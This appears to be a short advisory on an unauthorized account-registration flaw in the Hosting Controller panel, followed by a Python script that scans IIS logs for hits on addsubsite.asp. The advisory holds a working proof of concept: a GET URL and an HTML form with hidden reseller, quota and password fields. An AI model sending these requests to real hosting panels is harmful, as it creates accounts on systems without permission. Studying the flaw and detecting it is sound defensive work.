Hosting Controller Unauthorized Account Registration Vulnerability
An exploit is not required. Proof of concept examples are available:

http://www.example.com/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456

~~~advanced.html~~~
<FORM action="http://www.example.com/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make">
~~~advanced.html~~~
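
For defenders, a log check for the requests shown above (an added example, not part of the original advisory): it scans IIS W3C extended logs for hits on addsubsite.asp and flags those that carry loginname and password in the query string or arrive without a same-site referer. The log lines are constructed, and the `site_host` parameter and the referer heuristic are assumptions of this example.

```python
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/admin/hosting/addsubsite.asp"   # path named in the advisory
CRED_PARAMS = {"loginname", "password"}      # parameters named in the advisory

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2005-01-10 10:00:01 192.0.2.10 GET /admin/hosting/addsubsite.asp loginname=test1&password=x 200 -
2005-01-10 10:00:05 192.0.2.11 POST /admin/hosting/addsubsite.asp - 200 -
2005-01-10 10:00:09 198.51.100.7 POST /admin/hosting/addsubsite.asp - 200 http://www.example.com/admin/hosting/main.asp
2005-01-10 10:00:12 198.51.100.7 GET /admin/hosting/default.asp - 200 -
"""

def find_suspect_requests(log_text, site_host="www.example.com"):
    """Return (client_ip, method, reasons) for suspicious hits on ENDPOINT.

    site_host is a hypothetical parameter: the hostname the panel is served from.
    """
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        query = row.get("cs-uri-query", "-")
        params = set(parse_qs(query, keep_blank_values=True)) if query != "-" else set()
        referer = row.get("cs(Referer)", "-")
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        reasons = []
        if CRED_PARAMS <= {p.lower() for p in params}:
            reasons.append("credentials in query string")
        if ref_host != site_host:              # form submitted from outside the panel
            reasons.append("no same-site referer")
        if reasons:
            hits.append((row["c-ip"], row["cs-method"], reasons))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print(hit)
```

The Referer header is client-controlled, so the second flag is a triage signal rather than proof; the query-string flag matches the GET form of the request directly.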